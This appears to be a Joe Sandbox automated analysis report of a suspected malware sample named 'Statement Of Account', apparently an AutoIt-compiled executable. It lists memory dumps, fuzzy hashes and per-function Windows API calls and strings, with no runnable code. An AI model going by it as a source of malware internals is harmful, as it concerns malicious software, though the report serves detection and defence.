Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619

Function 00412C38 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4

Function 00412818 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4

Function 0041240C Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4

Function 00412038 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4

Function 03E4F238 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 4ab0f3390ea0b76e1a0049f573e369cbdda1bf31583bc547cd75b7497937696f
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: DD41C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 03E4F0C8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 37d7d71355ae29c0d308c953b0bb8644aecb99ded05e2e877bbcb6ede3af2c5a
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 15019278A00209EFCB44DF98D5909AEF7B5FB88310F208699D809A7741D730AE42DB80

Function 03E4F128 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: a6a9465764aa3f4910d40372064247939628df242405bf1070e49c66f22ad987
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: DA019278E01209EFCB44DF98D5909AEF7B6FB8C710F208699D809A7341D730AE42DB80

Function 00410D10 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229

Function 03E4DAA8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00459384 Relevance: 72.2, APIs: 37, Strings: 4, Instructions: 480filewindowcomCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 004593D7
DeleteObject.GDI32(?), ref: 004593F1
GetDesktopWindow.USER32 ref: 0045942A
GetWindowRect.USER32(00000000), ref: 00459431
SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
GetClientRect.USER32(00000000,?), ref: 004595C8
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
GlobalLock.KERNEL32(00000000), ref: 00459668
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
GlobalUnlock.KERNEL32(00000000), ref: 0045967F
CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00459694
OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
GlobalFree.KERNEL32(00000000), ref: 004596C0
CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
GetStockObject.GDI32(00000011), ref: 004597B7
SelectObject.GDI32(00000000,00000000), ref: 004597BF
GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
DeleteDC.GDI32(00000000), ref: 004597E1
_wcslen.LIBCMT ref: 00459800
_wcscpy.LIBCMT ref: 0045981F
CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
73A0A570.USER32(?,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598DE
SelectObject.GDI32(00000000,?), ref: 004598EE
SelectObject.GDI32(00000000,?), ref: 00459919
MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951

Strings

DISPLAY, xrefs: 004597A4
, xrefs: 004598D6
AutoIt v3, xrefs: 004595B5
static, xrefs: 00459606, 00459795

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$CreateObject$Global$Rect$DeleteFileSelect$MessageSendShow$A570AdjustAllocClientCloseCopyDesktopFaceFontFreeHandleImageLoadLockMovePictureReadSizeStockStreamTextUnlock_wcscpy_wcslen
String ID: $AutoIt v3$DISPLAY$static
API String ID: 3462561085-2373415609
Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69

Function 00441E05 Relevance: 48.3, APIs: 32, Instructions: 276COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00441E64
SetTextColor.GDI32(?,?), ref: 00441E6C
GetSysColorBrush.USER32(0000000F), ref: 00441E83
GetSysColor.USER32(0000000F), ref: 00441E8F
SetBkColor.GDI32(?,?), ref: 00441EAA
SelectObject.GDI32(?,?), ref: 00441EBA
InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
GetSysColor.USER32(00000010), ref: 00441EF8
CreateSolidBrush.GDI32(00000000), ref: 00441EFF
FrameRect.USER32(?,?,00000000), ref: 00441F10
DeleteObject.GDI32(?), ref: 00441F1B
InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
FillRect.USER32(?,?,?), ref: 00441FB6

Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3518701105-0
Opcode ID: 8d7e9eb6a1476829fb4e0a957564412aa33fdc92885306090b82eefa456b01e4
Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
Opcode Fuzzy Hash: 8d7e9eb6a1476829fb4e0a957564412aa33fdc92885306090b82eefa456b01e4
Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66

Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0042BA84

Strings

#include, xrefs: 0042BBBA
Unterminated group of comments, xrefs: 0042BCF9
#include-once, xrefs: 0042BB56
#comments-end, xrefs: 0042BCAC
#requireadmin, xrefs: 0042BA9F
#NoAutoIt3Execute, xrefs: 0042BAC1
#notrayicon, xrefs: 0042BA7C
Cannot parse #include, xrefs: 0042BC16
#comments-start, xrefs: 0042BC2C, 0042BC84
#ce, xrefs: 0042BCC0
#cs, xrefs: 0042BC40, 0042BC98
#OnAutoItStartRegister, xrefs: 0042BAE3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wcsnicmp
String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-3360698832
Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE

Function 00433D5C Relevance: 40.7, APIs: 27, Instructions: 198windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000E), ref: 00433D81
SetTextColor.GDI32(?,00000000), ref: 00433D89
GetSysColor.USER32(00000012), ref: 00433DA3
SetTextColor.GDI32(?,?), ref: 00433DAB
GetSysColorBrush.USER32(0000000F), ref: 00433DBF
GetSysColor.USER32(0000000F), ref: 00433DCB
CreateSolidBrush.GDI32(?), ref: 00433DD4
GetSysColor.USER32(00000011), ref: 00433DEB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
SelectObject.GDI32(?,00000000), ref: 00433E0D
SetBkColor.GDI32(?,?), ref: 00433E19
SelectObject.GDI32(?,?), ref: 00433E29
InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
DrawFocusRect.USER32(?,?), ref: 00433F1F
GetSysColor.USER32(00000011), ref: 00433F2E
SetTextColor.GDI32(?,00000000), ref: 00433F36
DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
SelectObject.GDI32(?,?), ref: 00433F63
DeleteObject.GDI32(?), ref: 00433F70
SelectObject.GDI32(?,?), ref: 00433F78
DeleteObject.GDI32(00000000), ref: 00433F7B
SetTextColor.GDI32(?,?), ref: 00433F83
SetBkColor.GDI32(?,?), ref: 00433F8F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflate$FocusMessageRoundSendSolidWindow
String ID:
API String ID: 1441705042-0
Opcode ID: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
Opcode Fuzzy Hash: aa49e6287f5c8eaa4963889518cb643ef6cff4134c3562cc94785d6825a4d511
Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A

Function 0046AEAF Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 417registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AFC2
RegCreateKeyExW.ADVAPI32(?,?,00000000,004848E8,00000000,?,00000000,?,?,?,?,?), ref: 0046B01C
RegCloseKey.ADVAPI32(?), ref: 0046B069

Strings

REG_SZ, xrefs: 0046B0F8
REG_QWORD, xrefs: 0046B29B
REG_MULTI_SZ, xrefs: 0046B162
REG_BINARY, xrefs: 0046B2E4
REG_DWORD, xrefs: 0046B257
REG_EXPAND_SZ, xrefs: 0046B084

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CloseConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3217815495-966354055
Opcode ID: 0576c88994f74b2f505fbc87b526c76ee4a7ccfdd2ff9ae5f0ee2fafbf8681fe
Instruction ID: d9d2404220d166b11353d33fb52652cf6d28829cdaa3b272cf204d1a2c990fb8
Opcode Fuzzy Hash: 0576c88994f74b2f505fbc87b526c76ee4a7ccfdd2ff9ae5f0ee2fafbf8681fe
Instruction Fuzzy Hash: 2CE1A1B1600300ABD710EF65C885F1BB7E8AF48704F14895EB945DB392D778E945CBAA

Function 00458F3F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 290windowCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00459042
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00459089
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459098
CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,?,?,?,00000000,00000000), ref: 004590E0
GetClientRect.USER32(00000000,?), ref: 004590ED
CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459131
GetStockObject.GDI32(00000011), ref: 00459153
SelectObject.GDI32(00000000,00000000), ref: 00459157
